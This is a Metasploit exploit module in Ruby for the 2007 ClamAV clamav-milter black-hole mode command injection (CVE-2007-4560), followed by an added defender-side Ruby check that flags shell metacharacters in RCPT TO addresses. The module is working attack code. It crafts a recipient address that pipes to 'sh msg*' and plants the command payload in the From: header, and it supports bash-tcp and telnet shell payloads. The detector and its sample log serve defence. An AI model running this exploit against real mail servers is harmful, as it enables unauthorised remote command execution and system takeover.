GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/smtp/clamav_milter_blackhole.rb
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Smtp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ClamAV Milter Blackhole-Mode Remote Code Execution',
      'Description'    => %q{
        This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter'
        (Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.
        When implemented with black hole mode enabled, it is possible to execute
        commands remotely due to an insecure popen call.
      },
      'Author'         => [ 'aushack' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2007-4560' ],
          [ 'OSVDB', '36909' ],
          [ 'BID', '25439' ],
          [ 'EDB', '4761' ]
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 1024,
          'Compat'      =>
            {
              'PayloadType' => 'cmd cmd_bash',
              'RequiredCmd' => 'generic perl ruby bash-tcp telnet',
            }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          [ 'Automatic', { }],
        ],
      'DisclosureDate' => '2007-08-24',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('MAILTO', [ true, 'TO address of the e-mail', 'nobody@localhost']),
      ])
  end

  def exploit
    # ClamAV writes randomized msg.###### temporary files in a randomized
    # /tmp/clamav-#######################/ directory. This directory is
    # the clamav-milter process working directory.
    #
    # We *can* execute arbitrary code directly from 'sploit', however the
    # SMTP RFC rejects all payloads with the exception of generic CMD
    # payloads due to the IO redirects. I discovered that the 'From:'
    # header is written to this temporary file prior to the vulnerable
    # call, so we call the file itself and payload.encoded is executed.

    sploit = "sh msg*" # Execute the clamav-milter temporary file.

    # Create the malicious RCPT TO before connecting,
    # to make good use of the Msf::Exploit::Smtp support.

    oldaddr = datastore['MAILTO']
    newaddr = oldaddr.split('@')

    datastore['MAILTO'] = "<#{newaddr[0]}+\"|#{sploit}\"@#{newaddr[1]}>"

    connect_login

    sock.put("From: ;#{payload.encoded}\r\n") # We are able to stick our payload in this header
    sock.put(".\r\n")

    # Clean up RCPT TO afterwards

    datastore['MAILTO'] = oldaddr

    handler
    disconnect
  end
end
```
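The root cause the module describes is a recipient local part reaching a `popen` call unescaped, so the check a mail filter (or a log reviewer) wants is one that rejects shell metacharacters in the local part of an `RCPT TO` path before anything spawns a process. The following Ruby is an added example written for this page; it is not part of the Metasploit module or of ClamAV. The metacharacter list, the `split_rcpt`, `suspicious_local_part?` and `flag_rcpt_lines` helpers, and the log lines are all constructed for the example; the `+` subaddress separator is treated as legitimate tagging and only the characters that would change how a shell parses the string are flagged.

```ruby
# Added example (not part of the Metasploit module or ClamAV): a defender-side
# check for recipient addresses whose local part would be dangerous to hand to
# a shell, plus a small scan over constructed SMTP log lines.

# Characters a mail filter should never let reach a process-spawning call.
# The set is an assumption for this example, not ClamAV's own validation.
SHELL_META = /["'`|;&$<>(){}\\\n\r]/

# Split an SMTP path such as "<user+tag@host>" into [local_part, domain],
# tolerating the optional angle brackets. Returns nil when there is no '@'.
def split_rcpt(path)
  addr = path.strip.sub(/\A</, '').sub(/>\z/, '')
  at = addr.rindex('@')
  return nil if at.nil?
  [addr[0...at], addr[(at + 1)..]]
end

# True when the local part contains shell metacharacters or cannot be parsed.
# A plain '+' subaddress (RFC 5233 style tagging) is allowed on its own.
def suspicious_local_part?(path)
  parts = split_rcpt(path)
  return true if parts.nil? # refuse what we cannot parse
  local, _domain = parts
  !!(local =~ SHELL_META)
end

# Scan SMTP transaction log lines and return the RCPT TO values that fail the
# check, so the same predicate doubles as a simple detection over logs.
def flag_rcpt_lines(log_lines)
  log_lines.filter_map do |line|
    m = line.match(/RCPT TO:\s*(<[^>]*>|\S+)/i)
    next unless m
    m[1] if suspicious_local_part?(m[1])
  end
end

# Constructed sample log. The second line has the shape of the address the
# module above builds from datastore['MAILTO']; the command is a placeholder.
SAMPLE_LOG = [
  'RCPT TO:<nobody@localhost>',
  'RCPT TO:<nobody+"|cmd"@localhost>',
  'RCPT TO:<alice+newsletter@example.test>',
  'MAIL FROM:<bob@example.test>',
].freeze

if __FILE__ == $PROGRAM_NAME
  flag_rcpt_lines(SAMPLE_LOG).each { |a| puts "suspicious recipient: #{a}" }
end
```

Run it directly and it prints the one flagged recipient from the sample log; in a milter the same predicate would sit in front of any code path that builds a command line from the recipient, rejecting the message rather than quoting the address after the fact.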